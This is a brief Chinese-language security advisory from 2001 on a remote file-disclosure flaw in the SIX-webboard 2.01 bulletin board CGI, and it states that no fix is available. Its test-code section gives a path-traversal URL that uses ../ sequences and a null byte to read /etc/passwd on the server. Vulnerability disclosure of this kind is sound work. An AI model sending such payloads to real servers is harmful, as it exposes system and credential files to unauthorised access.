SIX-webboard 2.01 存在可显示文件漏洞发布时间:2001-08-14 更新时间:2001-08-14 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 SIX-webboard 2.01详细描述 SIX-webboard 2.01 是由Pipo (webmaster@sixhead.com)编码的流行WEB 公告版程序,更多信息你可以查看此地址:http://www.sixhead.com 。 其中对用户的输入处理没有很好的检查,提交'..'和'/'的URL请求可以导致 目标文件的泄露。 测试代码 http://www.target.net/cgi-bin/webboard/generate.cgi ?content=../../../../../../../../../etc/passwd% 00&board=boardsname 解决方案 尚无 相关信息 Hannibal Lector (digitalseed@poizonb0x.org) |
